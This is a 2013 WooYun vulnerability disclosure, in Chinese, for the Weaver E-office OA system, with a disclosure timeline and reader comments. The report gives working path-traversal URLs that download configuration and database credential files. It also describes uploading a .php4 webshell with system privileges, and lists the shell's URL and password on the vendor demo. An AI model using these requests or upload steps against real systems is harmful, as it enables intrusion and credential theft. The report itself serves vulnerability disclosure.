当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038914

漏洞标题:泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)

相关厂商:上海泛微网络科技股份有限公司

漏洞作者: Coody

提交时间:2013-10-06 00:29

修复时间:2013-10-11 00:29

公开时间:2013-10-11 00:29

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-06: 细节已通知厂商并且等待厂商处理中
2013-10-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

继续 applychen 的脚步,因为之前我遇到过这个系统,最新官方demo中也确实存在问题。
感谢 applychen 提供的测试账号。
@cncert国家互联网应急中心 有什么问题,可以私信我。

详细说明:

继续  WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库  的挖掘
官方demo http://eoffice8.weaver.cn:8028/login.php
测试账号还是那个 xj


存在两个问题:

0x01:任意文件下载漏洞
测试链接 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
其中,参数 ATTACHMENT_NAME 未有效的控制其范围,导致任意文件下载
配置文件下载(程序zend加密,在网站http://www.showmycode.com/中可以解密)
http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843
数据库连接文件下载
http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843


0x02:文件上传导致任意代码执行
经分析inc/utility_all.php 的源码可知附件上传的路径为:attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME
建立个人日志--上传附件,查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值,
从配置文件中可以知道,附件中未禁止php4格式的文件上传,因此可以直接getshell
通过以上分析,最终得到的shell地址是:http://eoffice8.weaver.cn:8028/attachment/2506423447/conf1g.php4 密码是8(system权限)

漏洞证明:

0x01:任意文件下载漏洞
QQ图片20131005141421.jpg







oa-config解密后.jpg







.jpg





0x02:文件上传导致任意代码执行
QQ图片20131005141715.jpg







webshell.jpg







webshell.jpg







.jpg

修复方案:

确实存在通用性。

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-11 00:29

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

2013-10-11:CNVD在官方demo上确认所述情况,根据提取的应用特征查找到一些实例,由于未能取得当前测试用户权限,对于通用性还需要进一步确认。未及时确认,向白帽子致歉,根据行业用户潜在影响,rank 20(请剑心补上吧)

漏洞评价:

评论

  1. 2013-10-06 01:29 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @cncert国家互联网应急中心 。。。。很好奇一个月前那份泛微的报告谁写的 8081端口 默认口令 之类的。。。。命令执行还真没细看

  2. 2013-10-06 01:34 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @淡漠天空 亲,今夜无眠??

  3. 2013-10-06 02:02 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @Coody 听说朋友网可以看妹子QQ 正在聊。。。。

  4. 2013-10-06 08:01 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @疯狗 为什么我的洞审核每次都慢一点。。。

  5. 2013-10-06 08:05 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @Mas 不要急、请耐心等待一下哈,都比较辛苦哈

  6. 2013-10-06 15:46 | applychen ( 普通白帽子 | Rank:163 漏洞数:16 | 白发现首)

    这个漏洞是关于下载文件路径的那个算法的吗

  7. 2013-10-06 15:59 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @applychen 上传及下载都有。。。。

  8. 2013-10-10 11:28 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @cncert国家互联网应急中心

  9. 2013-10-11 07:46 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    无影响?????

  10. 2013-10-11 09:08 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    2013-10-11:CNVD在官方demo上确认所述情况,根据提取的应用特征查找到一些实例,由于未能取得当前测试用户权限,对于通用性还需要进一步确认。未及时确认,向白帽子致歉,根据行业用户潜在影响,rank 20(请剑心补上吧)

  11. 2013-10-11 09:12 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @xsser @疯狗

  12. 2013-10-11 09:14 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    我去把我自己测试时上传的马删掉吧

  13. 2013-10-11 11:38 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Coody 给了

  14. 2013-10-11 11:41 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @疯狗 3Q...